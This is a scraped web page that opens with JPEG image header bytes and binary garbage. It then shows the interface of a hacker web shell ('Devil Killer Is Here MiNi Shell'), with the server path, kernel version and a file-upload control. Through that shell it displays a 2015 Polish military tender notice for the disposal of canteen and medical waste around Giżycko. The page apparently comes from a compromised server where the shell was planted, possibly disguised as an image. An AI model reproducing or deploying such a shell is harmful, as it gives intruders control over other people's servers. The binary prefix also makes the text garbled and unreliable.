JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151218/347172-N-2015.html

<p class="kh_header"><b>Giżycko: USŁUGA ODBIORU I UNIESZKODLIWIANIA ODPADÓW Z PODZIAŁEM NA 2 ZADANIA: ZADANIE NR 1-ODBIÓR I UNIESZKODLIWIANIE ODPADÓW POKONSUMPCYJNYCH KATEGORII III O KODZIE 20 01 08, ZADANIE NR 2-ODBIÓR I UNIESZKODLIWIANIE ODPADÓW MEDYCZNYCH O KODACH:18 01 01, 18 01 02, 18 01 03 NA RZECZ 24 WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO W GIŻYCKU</b><br>
<b>Numer ogłoszenia: 347172 - 2015; data zamieszczenia: 18.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 24 Wojskowy Oddział Gospodarczy , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 261 335 922, faks 261 335 641.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA ODBIORU I UNIESZKODLIWIANIA ODPADÓW Z PODZIAŁEM NA 2 ZADANIA: ZADANIE NR 1-ODBIÓR I UNIESZKODLIWIANIE ODPADÓW POKONSUMPCYJNYCH KATEGORII III O KODZIE 20 01 08, ZADANIE NR 2-ODBIÓR I UNIESZKODLIWIANIE ODPADÓW MEDYCZNYCH O KODACH:18 01 01, 18 01 02, 18 01 03 NA RZECZ 24 WOJSKOWEGO ODDZIAŁU GOSPODARCZEGO W GIŻYCKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: usługa odbioru i unieszkodliwiania odpadów 
z podziałem na 2 zadania: zadanie nr 1 - odbiór i unieszkodliwianie odpadów pokonsumpcyjnych kategorii III o kodzie 20 01 08, zadanie nr 2-odbiór i unieszkodliwianie odpadów medycznych o kodach:18 01 01, 18 01 02, 18 01 03 I.  Zadanie nr 1 Odbiór i unieszkodliwianie odpadów pokonsumpcyjnych  kategorii III o kodzie 20 01 08. 1. Przedmiotem zamówienia jest odbiór i unieszkodliwienie odpadów pokonsumpcyjnych o kodzie 20 01 08 wg. Rozporządzenia Ministra Środowiska z dnia 29 grudnia 2014r. w sprawie katalogu odpadów (Dz. U. z 2014, poz. 1923) produktów ubocznych pochodzenia zwierzęcego kategorii 3, powstałych
w związku z żywieniem żołnierzy w punktach żywienia zbiorowego na terenie administrowanym przez 24 WOG. 
2. Usługa obejmuje odbiór i utylizację odpadów pokonsumpcyjnych: a.ze stołówki nr 5 na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 21, 11 - 500 Giżycko, b.ze stołówki nr 35 na terenie Jednostki Wojskowej Nr 4352 ul. Nowowiejska 20, 11 - 500 Giżycko, c.ze stołówki nr 12 na terenie Jednostki Wojskowej Nr 1460 ul. Wojska Polskiego 23, 12 - 250 Orzysz, d.ze stołówki nr 136 na terenie Jednostki Wojskowej Nr 3797 ul. Wojska Polskiego 23, 12 - 250 Orzysz, e.ze stołówki na terenie Jednostki Wojskowej Nr 2568 ul. Gen. J. Bema  7, 11-600 Węgorzewo. f.ze stołówki na terenie Jednostki Wojskowej Nr 2098 w Bemowie Piskim ul. Kętrzyńskiego 1, 12-230 Biała Piska oraz z punktów polowych na terenie poligonu Orzysz . g.ze stołówki nr 4 na terenie Jednostki Wojskowej Nr 4808 ul. Partyzantów 33, 19 -500 Gołdap. Ponadto może zaistnieć potrzeba odbierania odpadów pokonsumpcyjnych  w przypadku uruchomienia stołówki na terenie Jednostki Wojskowej Nr 1747 w m. Suwałki ul. Wojska Polskiego 21 Ilość odpadów:Pozycja 1	- 8.000 kg, Pozycja 2 	- 8.000 kg, Pozycja 3 	- 60.000 kg, Pozycja 4	- 60.000 kg, Pozycja 5      - 15.000 kg, Pozycja 6      - 250.000 kg, Pozycja 7      - 8.000 kg,  RAZEM:        409.000 kg (409 Mg). Zadanie nr 2 - odbiór i unieszkodliwienie odpadów medycznych o kodach: 18 01 01, 18 01 02, 18 01 03. 1. Przedmiotem zamówienia jest usługa w zakresie odbioru, transportu i unieszkodliwienie odpadów medycznych o kodach: - 18 01 01 - Narzędzia chirurgiczne i zabiegowe oraz ich resztki,- 18 01 02 - Części ciała i organy oraz pojemniki na krew i konserwanty służące do jej przechowywania, - 18 01 03 -  Inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do  przeniesienia materiału genetycznego, o których wiadomo, lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt z wyłączeniem 18 01 80 i 18 01 82. Zgodnie z Rozporządzeniem Ministra Środowiska z dnia 09 grudnia 2014 r. poz. 1923 w sprawie katalogu odpadów.2. Odbiór odpadów będzie następował z: - Ambulatorium JW. 4808, 19-500 Gołdap, ul. Partyzantów 33, tel. 261-336-329;  - Ambulatorium JW. 2098 Bemowo Piskie, 12-300 Bała Piska, ul. Kętrzyńskiego 1, 
tel. 261-333-205; - Ambulatorium JW. 2568, 11-600 Węgorzewo, ul. Bema 7, tel.261-337-237, 261-337-172;
- Ambulatorium JW. 2909, 11 - 500 Giżycko, ul 1 Maja, tel. 261-335-424.
 Szacunkowa ilość odpadów przewidzianych do unieszkodliwienia z w/w ambulatoriów - ok. 400 kg w okresie trwania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego stanowiącego nie więcej, niż 30% wartości zamówienia podstawowego opisanego wyżej, którego przedmiotem będzie usługa, polegająca na powtórzeniu zamówienia tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy pzp. Zamawiający udzieli zamówienia uzupełniającego w trybie z wolnej ręki temu samemu Wykonawcy, który wykonał zamówienie podstawowe.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.33.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w zakresie zadania nr 1 - odbiór i unieszkodliwianie odpadów pokonsumpcyjnych  kategorii III o kodzie 20 01 08 w kwocie 4 500 zł. Zamawiający żąda wniesienia wadium w pełnej wysokości przed terminem do składania ofert.
1.Wadium przetargowe należy wnieść do Zamawiającego w jednej lub kilku następujących formach:a.pieniądzu (przelewem na rachunek bankowy Zamawiającego w NBP O.Okr.Olsztyn nr 51 1010 1397 0020 1713 9120 1000 z dopiskiem: Wadium - post. nr 121/2015  - zadanie nr 1 -odbiór i unieszkodliwianie odpadów pokonsumpcyjnych  kategorii III o kodzie 20 01 08. b.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, c.gwarancjach bankowych, d.gwarancjach ubezpieczeniowych, e.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
2.W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
3.Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i kserokopia dowodu pochodzącego z systemu elektronicznych rozliczeń - wymaga potwierdzenia przez Wykonawcę -za zgodność z oryginałem. 4.Wadium wnoszone w formie: poręczeń, gwarancji bankowych lub ubezpieczeniowych należy złożyć w formie oryginału i kopii (przy czym kopia dokumentu winna być trwale spięta z ofertą). 5.Gwarancja bankowa lub ubezpieczeniowa składana jako wadium powinna zawierać: a.zobowiązanie gwaranta do zapłaty kwoty wadium w przypadku, gdy Wykonawca wygrywając przetarg odmówi podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, b.określenie wysokości zobowiązania gwaranta, którego wysokość musi być równa kwocie wadium, c.termin obowiązywania gwarancji powinien obejmować okres: 1)począwszy od upływu terminu składania ofert, który został określony  w dziale XI niniejszej siwz, a w przypadku jego zmiany, począwszy od upływu aktualnie obowiązującego terminu składania ofert, 2)aż do upływu ostatniego dnia terminu związania z ofertą, który został określony w dziale IX niniejszej siwz, d.wskazanie, iż beneficjentem gwarancji jest Zamawiający, e.oznaczenie, iż zleceniodawcą gwarancji jest Wykonawca,
f.klauzule, że gwarant zapłaci kwotę wynikającą z gwarancji na pierwsze żądanie Zamawiającego oraz że gwarancja jest nie odwoływalna.
6.Poręczenie bankowe lub udzielone przez podmiot określony w art. 6b ust.5 pkt. 2 ustawy z 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824) składane jako wadium powinno zawierać: a.zobowiązanie poręczyciela do zapłaty kwoty wadium w przypadku, gdy Wykonawca wygrywając przetarg odmówi podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, b.określenie kwoty, do jakiej następuje poręczenie - wysokość musi być równa kwocie wadium, c.termin obowiązywania poręczenia powinien obejmować okres: 1)począwszy od upływu terminu składania ofert, który został określony 
w dziale XI niniejszej siwz, a w przypadku jego zmiany, począwszy od upływu aktualnie obowiązującego terminu składania ofert, 2)aż do upływu ostatniego dnia terminu związania z ofertą, który został określony w dziale IX niniejszej siwz, d.wskazanie, iż poręczenie dotyczy wniesienia przez dostawcę wadium  w postępowaniu o udzielenie zamówienia publicznego ogłoszonego przez Zamawiającego.
9.Wadium wpłacone w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszonymi 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę. 10.W przypadku wadium wnoszonego w formie innej aniżeli w pieniądzu zaleca się, aby Wykonawca załączył dokumenty dotyczące wniesionego wadium do oferty. 11.Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza 
z zastrzeżeniem, iż Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
12.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 13.Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. Wniosek o zwrot wadium musi być podpisany przez osoby upoważnione do składania oświadczenia woli w imieniu Wykonawcy. 14.Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania unieważniono czynność wykluczenia Wykonawców lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
15.Wadium przetargowe wraz z odsetkami zatrzymuje Zamawiający wówczas, jeżeli Wykonawca którego oferta została wybrana:
a.odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, b.zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
ZAMAWIAJĄCY NIE ŻĄDA WNIESIENIA WADIUM W ZAKRESIE ZADANIA NR 2. ODBIÓR I UNIESZKODLIWIENIE ODPADÓW MEDYCZNYCH O KODACH: 18 01 01, 18 01  02, 18 01 03.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunek posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeśli udowodni ten fakt składając w ofercie przetargowej następujące dokumenty:W ZAKRESIE ZADANIA NR 1: Odbiór i unieszkodliwianie odpadów pokonsumpcyjnych  kategorii III o kodzie 20 01 08. a.Decyzję właściwego organu inspekcji weterynaryjnej na prowadzenie działalności gospodarczej polegającej na utylizacji produktów ubocznych pochodzenia zwierzęcego kat 3. 
(zgodnie z art. 24 Rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1069/2009 z dnia 21 października 2009r. określającego przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego, nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie (WE) nr 1774/2002 (rozporządzenie o produktach ubocznych pochodzenia zwierzęcego) (Dz. U. L 300 z 14.11.2009, str. 1-33). (zgodnie z art.6.1 pkt 2 ustawy z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych (Dz. U.  z 2014r. poz. 1539, z 2015r. poz. 266, 470).
b.Zezwolenie na zbieranie odpadów, lub zezwolenie na przetwarzanie odpadów, lub, pozwolenie zintegrowane,  lub wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości - na podstawie odrębnych przepisów, lub wpisu do rejestru Marszałka Województwa dotyczący posiadaczy odpadów prowadzących przetwarzanie odpadów zwolnionych z obowiązku uzyskania zezwolenia na przetwarzanie odpadów.
(zgodnie z art. 27 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz 21)
c.	 Zezwolenie na transport odpadów lub wpis do rejestru Marszałka Województwa w zakresie transportu odpadów. (zgodnie z art. 50 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz 21)
LUB
a.Decyzję powiatowego lekarza weterynarii na nadanie wpisu do rejestru na działalność nadzorowaną w zakresie transportowania ubocznych produktów pochodzenia zwierzęcego kat. 3;
(zgodnie z art. 23 Rozporządzenia Parlamentu Europejskiego i Rady (WE) nr 1069/2009 z dnia 21 października 2009r. określającego przepisy sanitarne dotyczące produktów ubocznych pochodzenia zwierzęcego, nieprzeznaczonych do spożycia przez ludzi, i uchylające rozporządzenie (WE) nr 1774/2002 (rozporządzenie o produktach ubocznych pochodzenia zwierzęcego) (Dz. U. L 300 z 14.11.2009, str. 1-33).
(zgodnie z art.6.1 pkt 2 ustawy z dnia 11 marca 2004r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych (Dz. U.  z 2014r. poz. 1539, z 2015r. poz. 266, 470).
b.Zezwolenie na transport odpadów lub wpis do rejestru Marszałka Województwa w zakresie transportu odpadów
(zgodnie z art. 50 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz 21).
 W ZAKRESIE ZADANIA NR 2: odbiór i unieszkodliwienie odpadów medycznych o kodach: 18 01 01, 18 01 02, 18 01 03.
Zamawiający uzna, że wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeśli udowodni ten fakt składając w ofercie przetargowej następujące dokumenty:
a.Zezwolenie na zbieranie odpadów, lub zezwolenie na przetwarzanie odpadów, lub, pozwolenie zintegrowane, lub wpisu do rejestru Marszałka Województwa dotyczący posiadaczy odpadów prowadzących przetwarzanie odpadów zwolnionych z obowiązku uzyskania zezwolenia na przetwarzanie odpadów.
(zgodnie z art. 27 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz. 21)
b.Zezwolenie na transport odpadów lub wpis do rejestru Marszałka Województwa w zakresie transportu odpadów.
(zgodnie z art. 50 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz. 21).
LUB
a.Zezwolenie na transport odpadów lub wpis do rejestru Marszałka Województwa w zakresie transportu odpadów
(zgodnie z art. 50 Ustawy z dnia 14 grudnia o odpadach Dz. U. z 2013r. poz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu posiadania niezbędnej wiedzy i doświadczenia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania niezbędnym potencjałem technicznym  do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu dysponowania osobami zdolnymi do wykonywania zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda od wykonawców udowodnienia faktu znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, przyjmując jako dokument potwierdzający spełnianie tego warunku, podpisane oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu, co jest dopuszczone w art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

